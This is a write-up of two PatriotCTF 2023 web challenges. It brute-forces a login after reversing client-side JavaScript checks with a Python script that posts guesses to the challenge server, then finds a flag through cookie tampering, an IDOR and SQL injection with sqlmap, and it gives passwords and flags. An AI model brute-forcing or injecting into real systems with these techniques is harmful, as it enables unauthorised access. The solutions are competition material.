# PatriotCTF 2023 ## Checkmate  At first glance we have a login challenge form that does not provide the source code so we will check the code in the viewsource ``` function checkName(name){ var check = name.split("").reverse().join(""); return check === "uyjnimda" ? !0 : !1; } function checkLength(pwd){ return (password.length % 6 === 0 )? !0:!1; } function checkValidity(password){ const arr = Array.from(password).map(ok); function ok(e){ if (e.charCodeAt(0)<= 122 && e.charCodeAt(0) >=97 ){ return e.charCodeAt(0); }} let sum = 0; for (let i = 0; i < arr.length; i+=6){ var add = arr[i] & arr[i + 2]; var or = arr[i + 1] | arr[i + 4]; var xor = arr[i + 3] ^ arr[i + 5]; if (add === 0x60 && or === 0x61 && xor === 0x6) sum += add + or - xor; } return sum === 0xbb ? !0 : !1; } // /check.php var btn = document.getElementsByClassName('btn-1')[0]; btn.addEventListener('click',(e)=>{ e.preventDefault(); var nam = document.getElementById('name').value; if(!(checkName(nam))){ alert('Incorrect Name! 😥😥') } else{ alert('Correct Name! 🙂🙂') } var pwd = document.getElementById('password').value; if(!checkValidity(pwd) && !checkLength(pwd)){ alert('Incorrect Password! 😥😥') } else{ alert('Correct Password! 🙂🙂') } }); ``` It seems like the username is ```adminjyu``` but where is the password? There is a checkValidity function. It seems like the password will have to be bypassed through this function. Okay, let's create a piece of code to generate a password that meets the requirements of this function. ``` import itertools import requests def check_validity(password): arr = [ord(char) for char in password if 97 <= ord(char) <= 122] sum_value = 0 for i in range(0, len(arr), 6): add = arr[i] & arr[i + 2] or_op = arr[i + 1] | arr[i + 4] xor = arr[i + 3] ^ arr[i + 5] if add == 0x60 and or_op == 0x61 and xor == 0x6: sum_value += add + or_op - xor return sum_value == 0xbb # Duyệt qua tất cả các tổ hợp 6 ký tự chữ thường từ 'a' đến 'z' charset = 'abcdefghijklmnopqrstuvwxyz' for i in charset: for j in charset: for k in charset: for v in charset: for a in charset: password = "a" + i + j + k +v+ a if check_validity(password): r = requests.post("http://chal.pctf.competitivecyber.club:9096/check.php", data = {"password": password}) if "incorrect password" not in r.text: print(password) ``` However, the number of satisfactory passwords is very large and it is difficult for us to bruteforce the password. Suddenly an idea popped into my head as to whether it has anything to do with the author or not and I changed the code. a little bit ``` import itertools import requests def check_validity(password): arr = [ord(char) for char in password if 97 <= ord(char) <= 122] sum_value = 0 for i in range(0, len(arr), 6): add = arr[i] & arr[i + 2] or_op = arr[i + 1] | arr[i + 4] xor = arr[i + 3] ^ arr[i + 5] if add == 0x60 and or_op == 0x61 and xor == 0x6: sum_value += add + or_op - xor return sum_value == 0xbb # Duyệt qua tất cả các tổ hợp 6 ký tự chữ thường từ 'a' đến 'z' charset = 'abcdefghijklmnopqrstuvwxyz' for i in charset: for j in charset: for k in charset: for v in charset: for a in charset: password = "s" + i + j + k +v+ a if check_validity(password): r = requests.post("http://chal.pctf.competitivecyber.club:9096/check.php", data = {"password": password}) if "incorrect password" not in r.text: print(r.text) print(password) break ``` Yeah password is ```sadsau``` and we got flag  ## One-for-all  I found the cookie value ```name=kiran``` So if I switch to ```admin``` what will happen   Continuing to search, I found the endpoint ```user?id=1```  Hmm may be IDOR let's change it to ```0```  Yeah we had the last part of flag Let's come back to primary endpoint. We had the search form with ```username``` parameter, SQLi ??? I try to use sqlmap and boom i guess correct we have the third part of flag  ``` secretsforyou ``` the second part of flag is at here, isn't it ??? Let's try this and boom we have all part of flag  Flag is ```PCTF{Hang_l00s3_and_Adm1t_ev3rtH1nG}```